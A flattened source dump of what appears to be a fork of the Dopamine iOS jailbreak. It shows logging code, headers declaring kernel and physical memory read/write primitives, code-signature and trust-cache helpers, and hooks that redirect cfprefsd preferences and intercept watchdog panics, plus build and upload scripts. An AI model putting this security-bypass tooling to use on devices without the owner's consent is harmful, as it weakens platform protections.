| 48 | logFilePath = malloc(strlen(LOGGING_PATH) + strlen(processName) + strlen(timestamp) + 6); 49 | strcpy(logFilePath, LOGGING_PATH); 50 | strcat(logFilePath, processName); 51 | strcat(logFilePath, "-"); 52 | strcat(logFilePath, timestamp); 53 | strcat(logFilePath, ".log"); 54 | }); 55 | 56 | FILE *logFile = fopen(logFilePath, "a"); 57 | if (logFile) { 58 | time_t ltime; 59 | struct tm result; 60 | char stime[32]; 61 | ltime = time(NULL); 62 | 63 | fprintf(logFile, "[%lu] [%s] ", ltime, prefix); 64 | vfprintf(logFile, format, va); 65 | fprintf(logFile, "\n"); 66 | 67 | fflush(logFile); 68 | fclose(logFile); 69 | } 70 | } 71 | 72 | void JBLogDebug(const char *format, ...) 73 | { 74 | if (!debugLogsEnabled) return; 75 | va_list va; 76 | va_start(va, format); 77 | JBDLogV("DEBUG", format, va); 78 | va_end(va); 79 | } 80 | 81 | void JBLogError(const char *format, ...) 82 | { 83 | if (!errorLogsEnabled) return; 84 | va_list va; 85 | va_start(va, format); 86 | JBDLogV("ERROR", format, va); 87 | va_end(va); 88 | } -------------------------------------------------------------------------------- /BaseBin/libjailbreak/src/log.h: -------------------------------------------------------------------------------- 1 | //#define ENABLE_LOGS 2 | 3 | #ifdef ENABLE_LOGS 4 | void JBLogDebug(const char *format, ...); 5 | void JBLogError(const char *format, ...); 6 | #else 7 | #define JBLogDebug(format ...) 8 | #define JBLogError(format ...) 9 | #endif 10 | 11 | //#define JBLogDebug(format ...) NSLog(@format) 12 | //#define JBLogError(format ...) NSLog(@format) -------------------------------------------------------------------------------- /BaseBin/libjailbreak/src/macho.h: -------------------------------------------------------------------------------- 1 | #import 2 | #import 3 | #import 4 | #import 5 | #import 6 | #import 7 | #import 8 | #import 9 | #import 10 | #import "csblob.h" 11 | 12 | void machoEnumerateArchs(FILE* machoFile, void (^archEnumBlock)(struct fat_arch* arch, uint32_t archMetadataOffset, uint32_t archOffset, BOOL* stop)); 13 | void machoGetInfo(FILE* candidateFile, bool *isMachoOut, bool *isLibraryOut); 14 | int64_t machoFindArch(FILE *machoFile, uint32_t subtypeToSearch); 15 | int64_t machoFindBestArch(FILE *machoFile); 16 | 17 | void machoEnumerateLoadCommands(FILE *machoFile, uint32_t archOffset, void (^enumerateBlock)(struct load_command cmd, uint32_t cmdOffset)); 18 | void machoFindLoadCommand(FILE *machoFile, uint32_t cmd, void *lcOut, size_t lcSize); 19 | void machoFindCSData(FILE* machoFile, uint32_t archOffset, uint32_t* outOffset, uint32_t* outSize); 20 | 21 | void machoEnumerateDependencies(FILE *machoFile, uint32_t archOffset, NSString *machoPath, void (^enumerateBlock)(NSString *dependencyPath)); 22 | 23 | void machoCSDataEnumerateBlobs(FILE *machoFile, uint32_t CSDataStart, uint32_t CSDataSize, void (^enumerateBlock)(struct CSBlob blobDescriptor, uint32_t blobDescriptorOffset, BOOL *stop)); 24 | NSData *machoCSDataCalculateCDHash(FILE *machoFile, uint32_t CSDataStart, uint32_t CSDataSize); 25 | bool machoCSDataIsAdHocSigned(FILE *machoFile, uint32_t CSDataStart, uint32_t CSDataSize); -------------------------------------------------------------------------------- /BaseBin/libjailbreak/src/pac.S: -------------------------------------------------------------------------------- 1 | .text 2 | 3 | .align 4 4 | 5 | .global _pac_loop 6 | _pac_loop: 7 | mov x0, #1 8 | adrp x1, _gUserReturnDidHappen@PAGE 9 | str x0, [x1, _gUserReturnDidHappen@PAGEOFF] 10 | b _pac_loop -------------------------------------------------------------------------------- /BaseBin/libjailbreak/src/patchfind.h: -------------------------------------------------------------------------------- 1 | void *patchfind_seek_back(void *startPtr, uint32_t toInstruction, uint32_t mask, unsigned int maxSearch); 2 | void *patchfind_find(int imageIndex, unsigned char *bytesToSearch, unsigned char *byteMask, size_t byteCount); -------------------------------------------------------------------------------- /BaseBin/libjailbreak/src/pplrw.h: -------------------------------------------------------------------------------- 1 | #import 2 | 3 | #define PPLRW_USER_MAPPING_OFFSET 0x7000000000 4 | #define PPLRW_USER_MAPPING_TTEP_IDX (PPLRW_USER_MAPPING_OFFSET / 0x1000000000) 5 | 6 | typedef enum { 7 | kPPLRWStatusNotInitialized = 0, 8 | kPPLRWStatusInitialized = 1 9 | } PPLRWStatus; 10 | extern PPLRWStatus gPPLRWStatus; 11 | 12 | uint64_t unsign_kptr(uint64_t a); 13 | 14 | uint64_t phystokv(uint64_t pa); 15 | uint64_t vtophys(uint64_t ttep, uint64_t va); 16 | uint64_t kvtophys(uint64_t va); 17 | void *phystouaddr(uint64_t pa); 18 | void *kvtouaddr(uint64_t va); 19 | 20 | uint64_t kaddr_to_pa(uint64_t virt, bool *err); 21 | 22 | int physreadbuf(uint64_t physaddr, void* output, size_t size); 23 | int physwritebuf(uint64_t physaddr, const void* input, size_t size); 24 | int kreadbuf(uint64_t kaddr, void* output, size_t size); 25 | int kwritebuf(uint64_t kaddr, const void* input, size_t size); 26 | 27 | uint64_t physread64(uint64_t pa); 28 | uint64_t physread_ptr(uint64_t va); 29 | uint32_t physread32(uint64_t pa); 30 | uint16_t physread16(uint64_t pa); 31 | uint8_t physread8(uint64_t pa); 32 | 33 | int physwrite64(uint64_t pa, uint64_t v); 34 | int physwrite32(uint64_t pa, uint32_t v); 35 | int physwrite16(uint64_t pa, uint16_t v); 36 | int physwrite8(uint64_t pa, uint8_t v); 37 | 38 | uint64_t kread64(uint64_t va); 39 | uint64_t kread_ptr(uint64_t va); 40 | uint32_t kread32(uint64_t va); 41 | uint16_t kread16(uint64_t va); 42 | uint8_t kread8(uint64_t va); 43 | 44 | int kwrite64(uint64_t va, uint64_t v); 45 | int kwrite32(uint64_t va, uint32_t v); 46 | int kwrite16(uint64_t va, uint16_t v); 47 | int kwrite8(uint64_t va, uint8_t v); 48 | 49 | void initPPLPrimitives(void); 50 | 51 | -------------------------------------------------------------------------------- /BaseBin/libjailbreak/src/signatures.h: -------------------------------------------------------------------------------- 1 | #import 2 | int getCSBlobOffsetAndSize(FILE* machoFile, uint32_t* outOffset, uint32_t* outSize); 3 | 4 | NSString *processRpaths(NSString *path, NSString *tokenName, NSArray *rpaths); 5 | NSString *resolveLoadPath(NSString *loadPath, NSString *machoPath, NSString *sourceExecutablePath, NSArray *rpaths); 6 | int evaluateSignature(NSURL* fileURL, NSData **cdHashOut, BOOL *isAdhocSignedOut); 7 | BOOL isCdHashInTrustCache(NSData *cdHash); 8 | int loadEmbeddedSignature(FILE *file); -------------------------------------------------------------------------------- /BaseBin/rootlesshooks/.gitignore: -------------------------------------------------------------------------------- 1 | .theos/ 2 | packages/ 3 | .DS_Store 4 | -------------------------------------------------------------------------------- /BaseBin/rootlesshooks/Makefile: -------------------------------------------------------------------------------- 1 | TARGET := iphone:clang:16.4:15.0 2 | INSTALL_TARGET_PROCESSES = lsd cfprefsd 3 | FINALPACKAGE = 1 4 | THEOS_PACKAGE_SCHEME = rootless 5 | ARCHS = arm64e 6 | 7 | include $(THEOS)/makefiles/common.mk 8 | 9 | TWEAK_NAME = rootlesshooks 10 | 11 | rootlesshooks_FILES = main.x installd.x cfprefsd.x 12 | rootlesshooks_CFLAGS = -fobjc-arc 13 | rootlesshooks_LDFLAGS = -rpath @loader_path/fallback 14 | 15 | include $(THEOS_MAKE_PATH)/tweak.mk 16 | -------------------------------------------------------------------------------- /BaseBin/rootlesshooks/cfprefsd.x: -------------------------------------------------------------------------------- 1 | #import 2 | #import "substrate.h" 3 | 4 | 5 | BOOL preferencePlistNeedsRedirection(NSString *plistPath) 6 | { 7 | if ([plistPath hasPrefix:@"/private/var/mobile/Containers"] || [plistPath hasPrefix:@"/var/db"] || [plistPath hasPrefix:@"/var/jb"]) return NO; 8 | 9 | NSString *plistName = plistPath.lastPathComponent; 10 | 11 | if ([plistName hasPrefix:@"com.apple."] || [plistName hasPrefix:@"systemgroup.com.apple."] || [plistName hasPrefix:@"group.com.apple."]) return NO; 12 | 13 | NSArray *additionalSystemPlistNames = @[ 14 | @".GlobalPreferences.plist", 15 | @".GlobalPreferences_m.plist", 16 | @"bluetoothaudiod.plist", 17 | @"NetworkInterfaces.plist", 18 | @"OSThermalStatus.plist", 19 | @"preferences.plist", 20 | @"osanalyticshelper.plist", 21 | @"UserEventAgent.plist", 22 | @"wifid.plist", 23 | @"dprivacyd.plist", 24 | @"silhouette.plist", 25 | @"nfcd.plist", 26 | @"kNPProgressTrackerDomain.plist", 27 | @"siriknowledged.plist", 28 | @"UITextInputContextIdentifiers.plist", 29 | @"mobile_storage_proxy.plist", 30 | @"splashboardd.plist", 31 | @"mobile_installation_proxy.plist", 32 | @"languageassetd.plist", 33 | @"ptpcamerad.plist", 34 | @"com.google.gmp.measurement.monitor.plist", 35 | @"com.google.gmp.measurement.plist", 36 | ]; 37 | 38 | return ![additionalSystemPlistNames containsObject:plistName]; 39 | } 40 | 41 | 42 | BOOL (*orig_CFPrefsGetPathForTriplet)(CFStringRef, CFStringRef, BOOL, CFStringRef, UInt8*); 43 | BOOL new_CFPrefsGetPathForTriplet(CFStringRef bundleIdentifier, CFStringRef user, BOOL byHost, CFStringRef path, UInt8 *buffer) 44 | { 45 | BOOL orig = orig_CFPrefsGetPathForTriplet(bundleIdentifier, user, byHost, path, buffer); 46 | 47 | if(orig && buffer && !access("/var/jb", F_OK)) 48 | { 49 | NSString* origPath = [NSString stringWithUTF8String:(char*)buffer]; 50 | BOOL needsRedirection = preferencePlistNeedsRedirection(origPath); 51 | if (needsRedirection) { 52 | NSLog(@"Plist redirected to /var/jb: %@", origPath); 53 | strcpy((char*)buffer, "/var/jb"); 54 | strcat((char*)buffer, origPath.UTF8String); 55 | } 56 | } 57 | 58 | return orig; 59 | } 60 | 61 | void cfprefsdInit(void) 62 | { 63 | MSImageRef coreFoundationImage = MSGetImageByName("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation"); 64 | void* CFPrefsGetPathForTriplet_ptr = MSFindSymbol(coreFoundationImage, "__CFPrefsGetPathForTriplet"); 65 | if(CFPrefsGetPathForTriplet_ptr) 66 | { 67 | MSHookFunction(CFPrefsGetPathForTriplet_ptr, (void *)&new_CFPrefsGetPathForTriplet, (void **)&orig_CFPrefsGetPathForTriplet); 68 | } 69 | 70 | %init(); 71 | } -------------------------------------------------------------------------------- /BaseBin/rootlesshooks/installd.x: -------------------------------------------------------------------------------- 1 | #import 2 | 3 | // BOOTLOOP RISK, DO NOT TOUCH 4 | /*%hook MIGlobalConfiguration 5 | 6 | - (NSMutableDictionary *)_bundleIDMapForBundlesInDirectory:(NSURL *)directoryURL 7 | withExtension:(NSString *)extension 8 | loadingAdditionalKeys:(NSSet *)additionalKeys 9 | { 10 | NSLog(@"_bundleIDMapForBundlesInDirectory(%@, %@, %@)", directoryURL, extension, additionalKeys); 11 | 12 | if ([directoryURL.path isEqualToString:@"/Applications"] && [extension isEqualToString:@"app"]) { 13 | NSMutableDictionary *origMap = %orig; 14 | 15 | NSURL *rootlessAppDir = [NSURL fileURLWithPath:@"/var/jb/Applications" isDirectory:YES]; 16 | NSMutableDictionary *rootlessAppsMap = %orig(rootlessAppDir, extension, additionalKeys); 17 | [origMap addEntriesFromDictionary:rootlessAppsMap]; 18 | return origMap; 19 | } 20 | 21 | return %orig; 22 | } 23 | 24 | %end*/ 25 | 26 | void installdInit(void) 27 | { 28 | %init(); 29 | } 30 | -------------------------------------------------------------------------------- /BaseBin/rootlesshooks/main.x: -------------------------------------------------------------------------------- 1 | #import 2 | 3 | NSString* safe_getExecutablePath() 4 | { 5 | extern char*** _NSGetArgv(); 6 | char* executablePathC = **_NSGetArgv(); 7 | return [NSString stringWithUTF8String:executablePathC]; 8 | } 9 | 10 | NSString* getProcessName() 11 | { 12 | return safe_getExecutablePath().lastPathComponent; 13 | } 14 | 15 | %ctor 16 | { 17 | NSString *processName = getProcessName(); 18 | if ([processName isEqualToString:@"installd"]) { 19 | extern void installdInit(void); 20 | //installdInit(); 21 | } 22 | else if ([processName isEqualToString:@"cfprefsd"]) { 23 | extern void cfprefsdInit(void); 24 | cfprefsdInit(); 25 | } 26 | } -------------------------------------------------------------------------------- /BaseBin/systemhook/Makefile: -------------------------------------------------------------------------------- 1 | TARGET = systemhook.dylib 2 | CC = clang 3 | 4 | CFLAGS = -I../_shared -I./src -isysroot $(shell xcrun --sdk iphoneos --show-sdk-path) -arch arm64e -miphoneos-version-min=15.0 -Wno-deprecated-declarations -Os -moutline 5 | LDFLAGS = -dynamiclib 6 | 7 | sign: $(TARGET) 8 | @ldid -S $^ 9 | 10 | $(TARGET): $(wildcard src/*.c) 11 | $(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^ 12 | 13 | clean: 14 | @rm -f $(TARGET) -------------------------------------------------------------------------------- /BaseBin/systemhook/src/common.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | #define HOOK_DYLIB_PATH "/usr/lib/systemhook.dylib" 5 | extern char *JB_SandboxExtensions; 6 | extern char *JB_RootPath; 7 | extern bool swh_is_debugged; 8 | 9 | #define JB_ROOT_PATH(path) ({ \ 10 | char *outPath = alloca(PATH_MAX); \ 11 | strlcpy(outPath, JB_RootPath, PATH_MAX); \ 12 | strlcat(outPath, path, PATH_MAX); \ 13 | (outPath); \ 14 | }) 15 | 16 | bool stringStartsWith(const char *str, const char* prefix); 17 | bool stringEndsWith(const char* str, const char* suffix); 18 | 19 | int64_t jbdswFixSetuid(void); 20 | int64_t jbdswProcessBinary(const char *filePath); 21 | int64_t jbdswProcessLibrary(const char *filePath); 22 | int64_t jbdswDebugMe(void); 23 | int64_t jbdswInterceptUserspacePanic(const char *messageString); 24 | 25 | int resolvePath(const char *file, const char *searchPath, int (^attemptHandler)(char *path)); 26 | int spawn_hook_common(pid_t *restrict pid, const char *restrict path, 27 | const posix_spawn_file_actions_t *restrict file_actions, 28 | const posix_spawnattr_t *restrict attrp, 29 | char *const argv[restrict], 30 | char *const envp[restrict], 31 | void *pspawn_org); -------------------------------------------------------------------------------- /BaseBin/systemhook/src/envbuf.h: -------------------------------------------------------------------------------- 1 | int envbuf_len(const char *envp[]); 2 | char **envbuf_mutcopy(const char *envp[]); 3 | void envbuf_free(char *envp[]); 4 | int envbuf_find(const char *envp[], const char *name); 5 | const char *envbuf_getenv(const char *envp[], const char *name); 6 | void envbuf_setenv(char **envpp[], const char *name, const char *value); 7 | void envbuf_unsetenv(char **envpp[], const char *name); -------------------------------------------------------------------------------- /BaseBin/systemhook/src/launchd.h: -------------------------------------------------------------------------------- 1 | #define OS_ALLOC_ONCE_KEY_MAX 100 2 | 3 | struct _os_alloc_once_s { 4 | long once; 5 | void *ptr; 6 | }; 7 | 8 | struct xpc_global_data { 9 | uint64_t a; 10 | uint64_t xpc_flags; 11 | mach_port_t task_bootstrap_port; /* 0x10 */ 12 | #ifndef _64 13 | uint32_t padding; 14 | #endif 15 | xpc_object_t xpc_bootstrap_pipe; /* 0x18 */ 16 | // and there's more, but you'll have to wait for MOXiI 2 for those... 17 | // ... 18 | }; 19 | 20 | extern struct _os_alloc_once_s _os_alloc_once_table[]; 21 | extern void* _os_alloc_once(struct _os_alloc_once_s *slot, size_t sz, os_function_t init); 22 | -------------------------------------------------------------------------------- /BaseBin/systemhook/upload.sh: -------------------------------------------------------------------------------- 1 | set -e 2 | 3 | PROJECT_NAME=systemhook.dylib 4 | DEVICE=root@localhost 5 | PORT=2223 6 | 7 | make 8 | ssh $DEVICE -p $PORT "rm -rf /var/jb/$PROJECT_NAME" 9 | scp -P$PORT ./$PROJECT_NAME $DEVICE:/var/jb/$PROJECT_NAME 10 | ssh $DEVICE -p $PORT "/var/jb/basebin/jbctl rebuild_trustcache" -------------------------------------------------------------------------------- /BaseBin/tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/BaseBin/tar -------------------------------------------------------------------------------- /BaseBin/watchdoghook/Makefile: -------------------------------------------------------------------------------- 1 | TARGET = watchdoghook.dylib 2 | CC = clang 3 | 4 | CFLAGS = -framework Foundation -framework CoreServices -framework Security -I../_shared -I./src -isysroot $(shell xcrun --sdk iphoneos --show-sdk-path) -arch arm64e -miphoneos-version-min=15.0 -fobjc-arc -O2 5 | LDFLAGS = -dynamiclib -rpath /var/jb/Library/Frameworks -rpath @loader_path/fallback -L../_shared -lellekit -framework IOKit 6 | 7 | sign: $(TARGET) 8 | @ldid -S $^ 9 | 10 | $(TARGET): $(wildcard src/*.m) 11 | $(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^ 12 | 13 | clean: 14 | @rm -f $(TARGET) -------------------------------------------------------------------------------- /BaseBin/watchdoghook/src/main.m: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #include "substrate.h" 7 | 8 | int64_t (*jbdswInterceptUserspacePanic)(const char *messageString) = NULL; 9 | kern_return_t (*IOConnectCallStructMethod_orig)(mach_port_t connection, uint32_t selector, const void *inputStruct, size_t inputStructCnt, void *outputStruct, size_t *outputStructCnt) = NULL; 10 | kern_return_t (*IOServiceOpen_orig)(io_service_t service, task_port_t owningTask, uint32_t type, io_connect_t *connect); 11 | mach_port_t gIOWatchdogConnection = MACH_PORT_NULL; 12 | 13 | kern_return_t IOServiceOpen_hook(io_service_t service, task_port_t owningTask, uint32_t type, io_connect_t *connect) 14 | { 15 | kern_return_t orig = IOServiceOpen_orig(service, owningTask, type, connect); 16 | if (orig == KERN_SUCCESS && connect) { 17 | if (IOObjectConformsTo(service, "IOWatchdog")) { 18 | // save mach port of IOWatchdog for check later 19 | gIOWatchdogConnection = *connect; 20 | } 21 | } 22 | return orig; 23 | } 24 | 25 | kern_return_t IOConnectCallStructMethod_hook(mach_port_t connection, uint32_t selector, const void *inputStruct, size_t inputStructCnt, void *outputStruct, size_t *outputStructCnt) 26 | { 27 | if (connection == gIOWatchdogConnection) { 28 | if (selector == 2) { 29 | return jbdswInterceptUserspacePanic((const char *)inputStruct); 30 | } 31 | } 32 | return IOConnectCallStructMethod_orig(connection, selector, inputStruct, inputStructCnt, outputStruct, outputStructCnt); 33 | } 34 | 35 | __attribute__((constructor)) static void initializer(void) 36 | { 37 | jbdswInterceptUserspacePanic = dlsym(RTLD_DEFAULT, "jbdswInterceptUserspacePanic"); 38 | MSHookFunction(IOServiceOpen, (void *)&IOServiceOpen_hook, (void **)&IOServiceOpen_orig); 39 | MSHookFunction(IOConnectCallStructMethod, (void *)&IOConnectCallStructMethod_hook, (void **)&IOConnectCallStructMethod_orig); 40 | } -------------------------------------------------------------------------------- /Dopamine/.gitignore: -------------------------------------------------------------------------------- 1 | /build 2 | /*.tipa 3 | /Dopamine/bootstrap/basebin.tar 4 | -------------------------------------------------------------------------------- /Dopamine/Dopamine.xcodeproj/project.xcworkspace/contents.xcworkspacedata: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /Dopamine/Dopamine.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | IDEDidComputeMac32BitWarning 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /Dopamine/Dopamine.xcodeproj/project.xcworkspace/xcshareddata/swiftpm/Package.resolved: -------------------------------------------------------------------------------- 1 | { 2 | "object": { 3 | "pins": [ 4 | { 5 | "package": "KernelPatchfinder", 6 | "repositoryURL": "https://github.com/opa334/KernelPatchfinder", 7 | "state": { 8 | "branch": "master", 9 | "revision": "fb34adb3c55154423cc18ec709fcb713bd67a890", 10 | "version": null 11 | } 12 | }, 13 | { 14 | "package": "PatchfinderUtils", 15 | "repositoryURL": "https://github.com/pinauten/PatchfinderUtils", 16 | "state": { 17 | "branch": "master", 18 | "revision": "68f6e7f430d94bc01315b0f1e753e3764b9cc31d", 19 | "version": null 20 | } 21 | }, 22 | { 23 | "package": "SwiftfulLoadingIndicators", 24 | "repositoryURL": "https://github.com/SwiftfulThinking/SwiftfulLoadingIndicators", 25 | "state": { 26 | "branch": null, 27 | "revision": "85858c0246dcd781228301f9928519f75ce89758", 28 | "version": "0.0.4" 29 | } 30 | }, 31 | { 32 | "package": "SwiftMachO", 33 | "repositoryURL": "https://github.com/pinauten/SwiftMachO", 34 | "state": { 35 | "branch": "master", 36 | "revision": "7bcffb07259191f7103ded3d29c77f05b7fed396", 37 | "version": null 38 | } 39 | }, 40 | { 41 | "package": "SwiftUtils", 42 | "repositoryURL": "https://github.com/pinauten/SwiftUtils", 43 | "state": { 44 | "branch": "master", 45 | "revision": "1d37faabb4c58b3152394c9b6e1c1a68507646b9", 46 | "version": null 47 | } 48 | }, 49 | { 50 | "package": "zstd", 51 | "repositoryURL": "https://github.com/facebook/zstd.git", 52 | "state": { 53 | "branch": "dev", 54 | "revision": "e256e4327459b77b14b300a7bc72b5a931cd1e56", 55 | "version": null 56 | } 57 | } 58 | ] 59 | }, 60 | "version": 1 61 | } 62 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AccentColor.colorset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "colors" : [ 3 | { 4 | "color" : { 5 | "color-space" : "srgb", 6 | "components" : { 7 | "alpha" : "1.000", 8 | "blue" : "0.529", 9 | "green" : "0.667", 10 | "red" : "0.020" 11 | } 12 | }, 13 | "idiom" : "universal" 14 | } 15 | ], 16 | "info" : { 17 | "author" : "xcode", 18 | "version" : 1 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/100.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/100.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/1024.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/1024.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/114.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/114.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/120.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/120.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/144.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/144.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/152.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/152.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/167.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/167.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/180.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/180.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/20.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/20.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/29.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/29.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/40.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/40.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/50.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/50.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/57.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/57.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/58.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/58.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/60.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/60.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/72.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/72.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/76.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/76.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/80.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/80.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/87.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/87.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Backgrounds/Clouds.imageset/Clouds@3x.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/Backgrounds/Clouds.imageset/Clouds@3x.jpg -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Backgrounds/Clouds.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "filename" : "Clouds.png", 5 | "idiom" : "universal", 6 | "scale" : "1x" 7 | }, 8 | { 9 | "filename" : "Clouds@2x.png", 10 | "idiom" : "universal", 11 | "scale" : "2x" 12 | }, 13 | { 14 | "filename" : "Clouds@3x.jpg", 15 | "idiom" : "universal", 16 | "scale" : "3x" 17 | } 18 | ], 19 | "info" : { 20 | "author" : "xcode", 21 | "version" : 1 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Backgrounds/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : { 3 | "author" : "xcode", 4 | "version" : 1 5 | } 6 | } 7 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Backgrounds/Wallpaper.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "universal", 5 | "scale" : "1x" 6 | }, 7 | { 8 | "idiom" : "universal", 9 | "scale" : "2x" 10 | }, 11 | { 12 | "filename" : "pexels-soubhagya-maharana-4124435.jpg", 13 | "idiom" : "universal", 14 | "scale" : "3x" 15 | } 16 | ], 17 | "info" : { 18 | "author" : "xcode", 19 | "version" : 1 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Backgrounds/Wallpaper.imageset/pexels-soubhagya-maharana-4124435.jpg: -------------------------------------------------------------------------------- 